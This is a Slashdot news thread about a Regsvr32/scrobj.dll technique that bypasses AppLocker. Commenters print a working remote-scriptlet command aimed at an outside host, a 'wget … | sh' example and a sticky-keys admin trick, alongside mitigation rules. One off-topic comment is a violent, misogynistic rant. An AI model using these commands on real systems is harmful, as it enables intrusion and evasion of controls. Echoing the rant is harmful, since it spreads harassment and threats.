Core Windows Utility Can Be Used To Bypass Whitelisting

Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.

Not surprised

[beastofburdon]

It sounds like this is one of the back doors put there for Micro$oft to use. The only flaw is that it was found.

Re:Not surprised

Meh, it still wouldn't get past my firewall.

Re:Not surprised

What are you, 12? The "M$" shit is getting old. I've seen that crap for 20 fucking years.

I'm sure Linux related companies like RedHat are non-profit and motivated strictly by a desire to improve the computing world. Money has no involvement whatsoever. I'm sure poor, broke Torvalds is frustrated from having to mooch free wifi from neighboring Starbucks while living under the highway overpass.

Re:Not surprised

[beastofburdon]

If your firewall is on your router I will agree with you, but it you are talking about the firewall on Windows, then you are seriously mistaken.

Re:Not surprised

[LichtSpektren]

Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".

Re:Not surprised

Hilariously wrong. regsvr has been in every release of Windows since at least Windows 95 and it might have even been in 3.1. Back when "back doors" were just a twinkle in Ronald Reagan's eye.

It was basically Microsoft's first hit off the crack pipe otherwise known as COM.

Re:Not surprised

[beastofburdon]

That means nothing at all. Why would you think Micro$oft wasn't thinking about taking control over the OS in 95?

Re:Not surprised

Maybe they should have. As a replacement for aging Unix installations or embedded devices, Linux does OK. For PCs it's a complete failure, though much of the blame lies with the Xserver, Linus's child-like refusal to create a stable driver ABI, assorted lame desktop environments, and other half-baked items (think pulse audio) that are included with Linux distros.

The greater point that trolls like you miss is that Microsoft's transgressions were some time ago and that every company, including Red Hat, have done things that break the law. It's just a matter of getting caught. Red Hat's saving grace is that it's too small to garner much attention.

Re:Not surprised

[Nunya666]

What are you, 12? The "M$" shit is getting old. I've seen that crap for 20 fucking years.

What are you, 10?

Just because a fucking abbreviation has been used for 20 years, it can no longer be used?

M$ is a behemoth and a corporate bully. I hope the malware known as Windows 10 cripples M$ to the point that they lose all clout within their industry.

There, I said it - M$, M$, M$

If you have something legitimate to bring to the conversation, then please do so. If not, then shut the fuck up.

Re:Not surprised

As I said, it still wouldn't get past my firewall.

Re:Not surprised

Whatever you say, M$ shill.

Re:Not surprised

[beastofburdon]

Good to hear. I need to get mine setup here soon before I get too many more "security patches" that fuck up my Win7 install. In fact I just need to set it to a very small whitelist for windows machines while leaving it open for Linux. I'm not sure how I'm going to do that yet though. Maybe set blocking by IP address and have static IP's?

Re:Not surprised

[myowntrueself]

Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".

Redhat used illicit monopolist tactics to force systemd on the rest of the Linux community

*ducks*

Re:Not surprised

Source IP and/or MAC is the standard method.

My router, an OpenBSD box, additionally does deep packet inspection.

Re:Not surprised

[beastofburdon]

MAC won't work, I'm dual booting on all my machines. I'm leaning towards IP.

Re: Not surprised

Sort of. I don't know the vector, but I'm guessing it has to do with Script Components and an HTTP implementation that bypasses Windows trust mechanisms. If there's privilege elevation involved, then that would be magic sauce associated with regsvr32.exs.

Re:Not surprised

Nah. Ignorance and a bunch of Windows users wanting to escape Vista/8 are why systemd took hold. Basically, systemd is *great* if you're running an appliance that doesn't do anything critical and can be rebooted without more than a bit of irritation. It's fucking nuclear waste for a system that needs to be up and working all the time or you lose money.

Re:Not surprised

[mlw4428]

My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM. Are you spoofing your MACs under Linux or something? I'm assuming your firewall is a router or other separate hardware appliance.

Re:Not surprised

[NatasRevol]

MACs are burned into the network controller's ROM.

LOL. Never played with VMware, have you? What would you like your MAC to be? I'll type it in for you if it's not autoassigned.

Re:Not surprised

[beastofburdon]

What? I was saying that blocking only Windows would not work by blocking by MAC address because I am dual booting on all my machines. I intend to block at the router level(ddwrt) by IP address and setting separate static IP addresses for Windows and Linux on all the machines.

The final goal is to only allow access to sites required for gaming when in Win7 with the possibility of a few others to support gaming like nexusmods.com

Re:Not surprised

Windows users wanting to escape Vista/8

I'm not buying this. SystemD reeks of the service management that Solaris has. Except where Solaris' management is actually useful, SystemD is a flaming pile of bloody stool.

Re:Not surprised

Um, no. It's a core OS Function, used to register COM DLLs. Every application installation and every developer that does anything remotely complex has used it.

Re:Not surprised

[beastofburdon]

How do you know that this is the only function? Do you have the source code? Can you compile it yourself and compare it to the stock binary?
I didn't think so.

Re:Not surprised

[mlw4428]

Well he said dual booting, not running VMs. I don't tend to consider running a VM as "dual booting", but I suppose that's just semantics. As for MAC: DEFACEDBABE1 was always fun (I remembered that from some website I no longer recall).

Re:Not surprised

[Killall+-9+Bash]

New Windows is part of a clever master plan. When people reject this disgusting new flavor, MS starts selling Windows Classic. In glass bottles. Made with real sugar.

Re:Not surprised

There, I said it - M$, M$, M$

Megadollars???

Re:Not surprised

[sexconker]

My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM..

MACs have been editable on consumer shit for ages. My old ass nForce 2 chipset from 2002 had an option to define the MAC via the BIOS and via the driver, for example.
Any NIC supporting virtual interfaces (such as for VLANs) will do the same thing.
Then you've got VMs.
Then you've got the fact that my physical interfaces are many (2 wireless, 2 wired on my main box), so even if I want to stick with the default MAC I've got 4 to handle.

Re:Not surprised

[Megol]

Okay so by posting that we know that you are immature at least intellectually, that you don't know the definition of malware - in fact being so far from the definition that you most likely have no clue about computers or programming.

The start of this sub-thread is ludicrous, no it isn't a back door for Microsoft to use. Know why? Us that actually knows what a computer is can check such things, maybe you'll learn about it when you grow up.

Re:Not surprised

[Megol]

Are you serious? If they wanted to take control of the OS they could have done it without crappy hacks - AS THEY FUCKING WROTE THE FUCKING SYSTEM!

Re:Not surprised

BECAUSE NO MEMORY PROTECTION!

every program could write wherever the fuck it wanted. WHY would YOU need to trojan it, when first best integer overflow gave you complete control over memory space? Not to mention that if they had filesharing turned on, it DIDNT #%" MATTER anymore, the box was yours to own.

Re:Not surprised

> if they had filesharing turned on, it DIDNT #%" MATTER anymore, the box was yours to own.

This, a million times. I have always thought it beyond ludicrous that ANYbody would believe how Windows 95 with filesharing turned on being open to anyboy on the network to hack, right down to the root level of drive C, was a MISTAKE.

How the FUCK can you make a "mistake" like that and NOT FIND IT IN TESTING?

And note how every MS OS just LEAKS data; born and patched insecure and unsecurable. You wonder where the Govt got all their surveillance data before the BushII cronies ginned up the PATRIOT act? Query: what OS sat on almost every desk, leaking data?

Re:Not surprised

[BadDreamer]

The stable ABI is what created most of the mess in Windows. Listing this as a shortcoming of Linux shows you have no idea what you're talking about. A huge mass of badly maintained binary only drivers is not a good thing, it's an incredible liability.

Drivers need to be maintained. The only way to ensure that is to have their maintenance be part of the kernel maintenance. A stable ABI would directly counteract this.

And Microsoft keeps doing transgressions. They haven't washed out their stripes. They've just been slapped on the wrist enough to not be blatant about it.

Re:Not surprised

[beastofburdon]

What do you mean with "crappy hacks"? Unless you are referring to the OS as a whole I do not know what you are talking about. I am talking about a backdoor built into the OS.

You know what else you can do from command line?

Make yourself administrator from the login screen by replacing the sticky keys executable with cmd.exe.

One more reason

to never ever connect windows anything to the internet.

Privately?

[Frosty+Piss]

A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.

Re:Privately?

They ignored it, so it became less private.

Re:Privately?

No. They didn't issue a patch within 2 hours, so he went public.

Re:Privately?

Now they looked at their backup to see who that whistle blower is.

Have any researchers gone missing?

windows_firewall-create_rule-regsvr32:block-done

easy.

Re:You know what else you can do from command line

[freeze128]

Windows System File checker will put that back.

A flaw but

[the_Bionic_lemming]

Don't all browsers have url javascript shut off by default?

Re:A flaw but

No, the opposite is true.

Re:A flaw but

[the_Bionic_lemming]

Actually, I know firefox does.

I don't use IE and will never use chrome, so I was just asking.

Real issue is whitelist bypass

[Virtucon]

You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.

Re:Real issue is whitelist bypass

The real issue is that regsvr32 understands URL's:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Running this tells Windows to fetch an XML file from the internet, which tells it to run cmd.exe. The magic here is that if you change cmd.exe for any program outside the AppLocker whitelist, bingo: it will start, in theory. regsvr32 is part of the operating system and can be used to register and unregister COM script files with the Windows Registry. /s tells regsvr32 to be silent, /n tells it not to use DllRegisterServer, /i passes an optional parameter (our URL) to DLLinstall, /u means we're trying to unregister an object, and scrobj.dll is Microsoft's Script Component Runtime.

Re:Real issue is whitelist bypass

[geek111]

This exploit does not need admin rights. I just tried it. the request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

(Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Re:Real issue is whitelist bypass

why not just add an acl preventing all but local admin from using it..

This isn't really big news though, you have to have had physical access to the system at a user level, know of a compromised url, etc... Its useful for folks who want to hack themselves.. but its meh as it stands.

Re:Real issue is whitelist bypass

That means a would-be hacker would still have to already have access to your system in order to run cmd.exe. At that point, it would already be too late and registering URLs would be pointless.

Re:Real issue is whitelist bypass

It's just the same as curl | sudo bash -. I find the use of "remote code execution" irritating, because that usually implies that someone can remotely upload his code to a computer and have that computer execute it, not that a local user downloads code and runs it.

Re: Real issue is whitelist bypass

What do you mean no had tried? I suspect no one considered the risks. Administrators have been using workarounds like this for decades to manage poorly implemented third-party installers.

Re:Real issue is whitelist bypass

[geek111]

This isn't about gaining remote access to the system. This is about elevating access you already have.

Being able to use RegSrvr32.dll to bypass AppLocker provides arbitrary code execution without leaving any trace of it on the file system. Combine it with other vulnerabilities and you're cooking with gas!

Re:Real issue is whitelist bypass

Colour me unconcerned. If the exploit requires ready access to my command prompt to deploy, then it's not much of an exploit.

Re:Real issue is whitelist bypass

[foradoxium]

can a driveby not run this command? That's what I find concerning. To your point, if someone is running this on the box you are already hosed. But if something from a website is able to run this on a user's box, without admin rights and quietly, this is a concern.

Re:Real issue is whitelist bypass

[DigiShaman]

So basically it can seed and execute Ransomware from an HTTPS session?? Oh, NICE! NOT!!! Being that form of malware runs purely in RAM and doesn't leave a trace of code on the disk other than encrypting local and mapped data.

Re:Real issue is whitelist bypass

That isn't the case. In order for remote code to be executed with this "vulnerability" the URL from the badware site would have to be registered first.

Re:Real issue is whitelist bypass

[citizenr]

Just tried it and my firewall http://www.binisoft.org/wfc.ph... (default: deny all outgoing/incoming) gave me a nice popup asking if I want to allow it.

Re:Real issue is whitelist bypass

This exploit does need admin rights. I just edited that file to make it run msconfig.msc and hosted it on my server. When I run that command I get a UAC prompt because I'm running Win10 as a user and not admin. (which is infuriatingly complicated to figure out without googling where the damn setting is)

Is this really news?

[LichtSpektren]

Shellshock and the recent glibc vulnerabilities were big deals because Linux-stacks are widely expected to be secure. On the other hand, the Microsoft ecosystem is so plagued with exploits and vulnerabilities, that Slashdot would consist of nothing but security advisories for Windows if we reported all of them.

It's Friday...

Just lay off the serious stuff and have a good weekend.

Pig in a Poke!

Oink! Oink! We'll be pigs!

It's LUDDITE software!

Modern app appers know that ONLY apps can app apps, so ditch this LUDDITE software and start apping apps!

Apps!

Re:It's LUDDITE software!

Do you got snaps for your apps?

Holy Shit!

[LVSlushdat]

Sure glad I dumped Windows about 5 years ago. I used/supported it for nearly 20 years, but after I retired in 2010, I decided I was done with it.. Looks like I made the right decision...

Re:Holy Shit!

https://www.sciencedaily.com/t...

This is what you just did and told the world about.

Re:Holy Shit!

Aren't you doing the same thing with your post?

Re:Holy Shit!

So, a new massive back door in Windows is confirmation bias?

OOOOkkkkkkkk

Re:Holy Shit!

No 'Sure glad I dumped Windows about 5 years ago' then speculation on why this is a big deal is just reaffirming his bias.

I use OS's to launch programs. Not to be a fan of. I learned that lesson the hard way from OS2.

Re:Holy Shit!

We get it, you're retired, you don't use Windows anymore, and you apparently have Alzheimer's. You don't have to mention all this every time you make a post.

Disable Advertising

[U2xhc2hkb3QgU3Vja3M]

The Disable Advertising checkbox does not work.

Re:Disable Advertising

[JustAnotherOldGuy]

The Disable Advertising checkbox does not work.

The "Install Adblock" checkbox seems to work, though.

Bit9?

[darrellg1]

I would think this can bypass Bit9 as well, since regsvr32 is a common windows component and allowed. Anyone got a different opinion?

Re:Bit9?

Absolutely correct. Probably applocker is just free to test against.

Easy Fix - No Patch Required

[Mr.Intel]

It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block

Re:Easy Fix - No Patch Required

Does not work on 2 installs.

Re:Easy Fix - No Patch Required

[davor_p]

Do not forget Wow64 version of the executable in %SystemRoot%\SysWOW64 directory on 64-bit systems:

New-NetFirewallRule -DisplayName "Block Regsvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
New-NetFirewallRule -DisplayName "Block Regsvr32 Wow64" -Program "%SystemRoot%\SysWOW64\regsvr32.exe" -Direction Outbound -Action Block

(do try to run this from PowerShell with admin rights as well)

I'd laugh

[JustAnotherOldGuy]

I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.

Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?

Re:I'd laugh

[Megol]

Standard operating systems have a lot of surface to exploit. The real question is if there will ever be a secure operating system, I'm not sure given the expectations of users. Still could be a _lot_ better...

Fernanda Carolina puta retardada

The only way to avoid Windows bugs is... Not using it. Oh BTW, soon the little turd will passby showing her fucked cunt as a peacock, the I deny because I'm not a retard, then her "order of the little shit" friends will troll me the rest of the day.

Dudes, I don't give a fuck. For me, that retarded cunt can commit suicide that I don't have any remorse. A will be happy knowing she died.

I'm a satanist. Therefore I hate child abuse and wish a violent death upon the ones who hurt kids. Also, I don't wanna kgo o heaven, so any catholic retard who believes in redemption, or any fucked jew willing to steal my ideas, are not welcome in my life. Mainly retarded girls who don't have a brain to have a conversation. I will never change my opinion because forgiveness is nothing but opening a door to be betrayed.

I'm proud of joining the chat room that day and lying that I commited suicide. If your retarded son tried to commit suicide and now had to cut his penis off to justify being a cock junkie, It's not my problem. I did it once, and I can do it again, just like this:

If that retarded came to live here because whe wants to observe me before she dies, because she dreams about reincarnating as my daughter, she is wronge, because I'm never having a child. If someone get pregtant, I kick the retarded belly until it abort, because I don't want contact with this retarded little shit not in this life, nor even on another.

Re: Fernanda Carolina puta retardada

Please, by all means, MEDICATE yourself or seek help.

RTFM: AppLocker

[clovis]

So basically the guy hat wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
https://technet.microsoft.com/...

AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.

Re:RTFM: AppLocker

[Sarten-X]

Looks like you didn't read TFA.

The exploit is that regsvr32 can download a script from the Internet and execute it. If that script launches an executable that AppLocker should block, teh executable will launch anyway.

In short, not only is a single command all that's necessary to download a malware kit from the Internet and run it, the kit can be a simple (and locally untraceable) way to get around AppLocker restrictions.

Re:RTFM: AppLocker

[clovis]

I did read the article, and understand the attack.
The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

If users can run cmd prompts and regsvr32, then you're hosed anyway.
If you want to prevent misuse of regsvr32, cmd prompts and tools like that, you use Group Policy.

Re:RTFM: AppLocker

[whoever57]

The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

Basically, what you are saying is that Applocker is designed to be ineffective.

Re:RTFM: AppLocker

[clovis]

The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

Basically, what you are saying is that Applocker is designed to be ineffective.

Lol, good one, but no.

AppLocker does what it is supposed to do, and it does not do what it says it can't do. But you would not know that unless you read the documentation.
AppLocker documentation specifically says it does not protect against something like regsv32r's newly discovered behavior.

AppLockers purpose is to simplify software restriction policies and it's useful for that.
If you have to create the images for 1,000 workstations, and only 500 of them have licensing for Microsoft office, 150 have licenses for the full Adobe suite,. There's several departments have a hard requirement for MS Access 2010, but MS Office 2013 is the corporate standard.
You can make a single image with all the software installed and use AppLocker to prevent the people who should not be running those other apps from launching them so as to meet licensing restrictions. This beats the heck out of building and maintaining a dozen separate images for each department.
There are many ways to solve this problem, sure, and AppLocker is one of them.
It's base purpose not an anti-malware tool, but it can help mitigate the threat.

Re:RTFM: AppLocker

[whoever57]

Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

I never claimed that it was an anti-malware tool.

Re:RTFM: AppLocker

OUCH!
Why don't you get the facts right?
In the proof of concept regsvr32.exe is neither used to download a scriptlet nor to register a DLL on the local machine!
Do your homework and read https://support.microsoft.com/en-us/kb/249873 plus https://msdn.microsoft.com/en-us/library/bb759846.aspx: the /I option just passes any string AS-IS to the DllInstall() routine of the DLL called by regsvr32.exe
It's but scrobj.dll which downloads the scriptlet and eventually runs the embedded JScript or VBScript. To be clear: scrobj.dll is DESIGNED to run JScript or VBScript embedded in a .SCT file.
The bypass of AppLocker as well as SAFER to run arbitrary JScript or VBScript, but not arbitrary executables, is due to the fact that scrobj.dll is not a component of the Windows script host.
The latter uses AppLocker or SAFER to determine if execution of scripts (independent of their file extension) is allowed,
  the former does not (just like other applications which execute JScript or VBScript, for example mshta.exe, any web browser, ...).
Also note: neither regsvr32.exe nor the JScript/VBScript run via scrobj.dll can't run and register DLLs or execute EXEs blocked by AppLocker or SAFER!

Re:RTFM: AppLocker

[clovis]

Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

I never claimed that it was an anti-malware tool.

From the documentation:

AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.

Again:

You must thoroughly examine each application before allowing them to run by using AppLocker rules.

Do users need to be running regsvr32? No, they do not. You block it using AppLocker just like you block regedit.exe and sol.exe

Also, if you go to the trouble is implementing something AppLocker, you don't let users open cmd prompts or run bat files. No ordinary user should be able to type in anything like "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll" and run it if you have control of the corporate systems.

Full disclosure: we don't use AppLocker where I work, but we use other means to block cmd prompts, browsing the file system, application launching and so on.

Re:You know what else you can do from command line

And how did you replace that file to begin with?

So much for responsible disclosure.

[nuckfuts]

I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

Re:So much for responsible disclosure.

I can authoritatively say responsible disclosure was followed. Microsoft has no plans to address the issue since it is not an actual exploit. This may change given the additional attention. This is only one example of many similar issues reported to Microsoft about ApplLocker that have been ignored.

Re:So much for responsible disclosure.

[guruevi]

According to the summary, the researcher did disclose this to Microsoft and they probably didn't respond. This is really a one-day patch kind of thing. Responsible disclosure is only invented by the corporations like Microsoft so they don't have to react quickly to a bug and it's reasonable to expect that the NSA is involved as well so they have a window to exploit the bug.

After the push to responsible disclosure by Microsoft, their products suddenly got "safer". I say disclose, God knows how many bugs Microsoft is sitting on that were "responsibly" disclosed.

Re:So much for responsible disclosure.

[chispito]

I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

It's a post-compromise application whitelisting bypass, of which there are other techniques. I don't think this is quite what you think it is.

Re:So much for responsible disclosure.

Most security software vendors will now just add the hash of sample XML to their blacklists and claim that they prevent this attack. It is sad, how badly most of the "security" suites actually work. Someone should really start picking them by modifying the public exploit one bit a time until the snake oil companies give up.

Nope

[The+MAZZTer]

regsvr32 does not understand DLLs. scrobj.dll does... the contents of the /i switch are passed in to the DLL. Looks like the DLL is the one with the problem.Documentation

I expect most admins can simply block or remove the DLL with little impact on their system unless they are running some obscure program that requires it. Or, as another user suggested, firewall regsvr32 so it can't download files.

Seems simple?

[jon3k]

Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?

Re:Seems simple?

[Joe_Dragon]

as long as that does not mess up some apps / background stuff / updates and so on.

Re:You know what else you can do from command line

You need to use the recovery disk to boot off. Any recovery disk will do. Then you go into the repair console...

http://lifehacker.com/5612487/hack-the-sticky-keys-feature-to-reset-a-forgotten-windows-password

so much for intelligent thought

don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond.

1. why are we not surprised that you don't see any indication of what would have been a private conversation

2. yes indeed, we are all better off when there is a nice long period of time when users are vulnerable and clueless

Re: You know what else you can do from command lin

So not a remote exploit. Move along.

Easy fix?

[U2xhc2hkb3QgU3Vja3M]

Can't you just rename the damn file to something else?

Forever a 32-bit OS

*nm*

Alex Ionescu

[iampiti]

...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.

Re:windows_firewall-create_rule-regsvr32:block-don

Install OpenBSD on all hosts on your LAN. Install pfSense for a router, install and enable Snort IDPS.

Read stories about windows users getting owned by this kind of stuff and shake my damn head, family.

easy.

Most linux installs have something like that.

wget https://www.attacker.website | sh

If you're able to run terminal commands, it's already game over.

Re:Most linux installs have something like that.

[guruevi]

But can you run the above as root without having sudo privileges? The exploit is that anyone, even a browser can execute the code.

Re:Most linux installs have something like that.

Neither can regsvr32.exe ... run with administrative privieleges/rights when started by an unprivileged user.
And no, a browser can't execute arbitrary command lines, neither in Linux, *BSD or Windows.
The embedded JScript/VBScript can TRY to run arbitrary command lines: if but any command or DLLs necessary to run them is blocked by AppLocker or SAFER it's just a try, but no execution!

Re:windows_firewall-create_rule-regsvr32:block-don

yeah but.. shake your damn head AND FAMILY? Dare I ask?

Adblocking browser addons = inferior vs. hosts

See subject: Can they do 16 things hosts do 4 speed, security & reliability (+ more efficiently)?

1.) Protect vs. bad sites (past ads)
2.) Protect vs. fastflux botnets + stop C&C talk
3.) Protect vs. dyn dns botnets + stop C&C talk
4.) Protect vs. DGA botnets + stop C&C talk
5.) Protect vs. downed DNS (reliability)
6.) Protect vs. DNS redirect poisoning
7.) Protect vs. trackers
8.) Protect vs. spam payload links
9.) Protect vs. phish payload links
10.) Protect vs. caps
11.) Get past dns blocks
12.) Avoid dnsrequest logs
13.) Speed up surfing (adblock & hardcodes)
14.) Works on anything webbound multiplatform.
15.) EZ datacontrol
16.) Block ads more efficiently

Answer's NO on addons + hosts = on devices natively - not illogically inefficiently "Bolting on 'MoAr'".

(Ads on same site = rare: Admen don't trust webmasters)

Addons = blockable by ClarityRay by native browser methods: Untrue for hosts.

APK

P.S.=> Hosts != crippled & 'souled-out' to advertisers like "AlmostALLAdsBlocked"

For the BEST possible hosts file?

APK Hosts File Engine 9.0++ SR-4 32/64-bit http://www.bing.com/search?q=%...

Less power/cpu/ram + IO use + complexity vs. local DNS, routers & antivirus w/ less security issues. Compliments firewalls (no layered drivers firewalls use blocking less used IP addys, hosts block more used hostnames) & DNS (lightens dns load). Gets data via 10 security sites.

Works vs. HTTP PUSH ads in Chrome w/ firewalls.

* Ads rob speed you pay for, security (openbid ad networks malware makers abuse), privacy in tracking + anonymity.

(Hosts gain speed (hardcodes + adblocks), security (vs. bad sites/poisoned dns), reliability (vs. downed dns), & anonymity (dns requestlogs/trackers) w/ what you natively have. Hosts != blockable by ClarityRay like Adblock/UBlock/Ghostery)

APK

P.S. - Proven safe https://www.virustotal.com/en/...

(Verified by Mr. S. Burn of Malwarebytes: "I've seen the code & yes it is safe" http://forum.hosts-file.net/vi... )

Re:For the BEST possible hosts file?

Whipslash - I though you told us "APK's days are numbered"?

WTF?

Re:For the BEST possible hosts file?

He failed. Webmasters like whipslash\JustAnotherOldGuy fear apk's program yet he allows JustAnotherOldGuy, AmicusNYCL or Coren22, apk's detractors who can't prove apk wrong downmodding his posts proving hosts superiority, to post. That alone evidences my statement. Truth's impossible to stop. Truth like apk posts on host they can't disprove along with JustAnotherOldGuy literally stating he doesn't mind adblock users. Of course not. He does Google ads which adblock is crippled by default to not stop. Think whipslash isn't the same? Googlesyndication/gstatic servers are in use on /. and hosts do block them from stealing your speed or possibly infecting you. It proves that much too. It's very obvious. Their favorite color is transparent and I can see right through them. So can anyone else by their petty 1 sided actions.

YMBK

The 1% want it to be as it is. Think yourself why.

fuck and vodka

Might help in your condition. Go for it.

So What

there is freebsd.

and oberon.

as soon as the commie hipsters, in the pay of 1%, show up somewhere, we have moved on.

although regsvr32 can be firewalled off

You have not already done that?

Summary misleading, not really a vulnerability

[cookd]

The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:

- Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
- The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you aren't in the Design department, so you aren't licensed to run it", and perhaps to reduce attack surface area.
- The Microsoft-provided sample AppLocker configuration (intended to show the syntax for AppLocker rules) happens to have a sample rule that whitelists all programs under C:\windows. This is not a "recommended" rule -- it's a "sample" rule.
- If you leave this rule in, there are a large number of ways to escape the sandbox.
- A researcher found another one. Yay, I guess?

The new one is interesting because I wouldn't have considered regsvr32 to be a command that allows for running of arbitrary other commands. On the other hand, it shouldn't belong in a production whitelist in the first place, so being able to use it to escape the sandbox isn't particularly interesting.

Adblocking browser addons = inferior vs. hosts

See subject: Can they do 16 items hosts do 4 speed, security & reliability (more efficiently)?

1.) Protect vs. bad sites (past ads)
2.) Protect vs. fastflux botnets + stop C&C talk
3.) Protect vs. dyn dns botnets + stop C&C talk
4.) Protect vs. DGA botnets + stop C&C talk
5.) Protect vs. downed DNS (reliability)
6.) Protect vs. DNS poisoning
7.) Protect vs. trackers
8.) Protect vs. spam payload links
9.) Protect vs. phish payload links
10.) Protect vs. caps
11.) Get past dns blocks
12.) Avoid dnsrequest logs
13.) Speed up surfing (adblock & hardcodes)
14.) Works on anything webbound multiplatform.
15.) EZ datacontrol
16.) Block ads more efficiently

Answer's NO on addons doing it or @ ALL + hosts = on devices natively - not illogically inefficiently "Bolting on 'MoAr'".

(Ads on same site = rare: Admen don't trust webmasters)

Addons = ClarityRay blockable by native browser methods: Untrue for hosts.

APK

P.S.=> Hosts != crippled & 'souled-out' to admen like "AlmostALLAdsBlocked"

Works as designed!

In the proof of concept regsvr32.exe is neither used to download a scriptlet nor to register a DLL on the local machine!
Do your homework and read https://support.microsoft.com/en-us/kb/249873 plus https://msdn.microsoft.com/en-us/library/bb759846.aspx: the /I option just passes any string AS-IS to the DllInstall() routine of the DLL called by regsvr32.exe
It's but scrobj.dll which downloads the scriptlet and eventually runs the embedded JScript or VBScript.
To be clear: scrobj.dll is DESIGNED to run JScript or VBScript embedded in a .SCT file.

The bypass of AppLocker as well as SAFER to run arbitrary JScript or VBScript, but not arbitrary executables, is due to the fact that scrobj.dll is not a component of the Windows script host.
The latter uses AppLocker or SAFER to determine if execution of scripts (independent of their file extension) is allowed or blocked, the former does not (just like other applications which execute JScript or VBScript, for example mshta.exe, any web browser, ...).
Also note: neither regsvr32.exe nor the JScript/VBScript run via scrobj.dll can run and register DLLs or execute EXEs blocked by AppLocker or SAFER!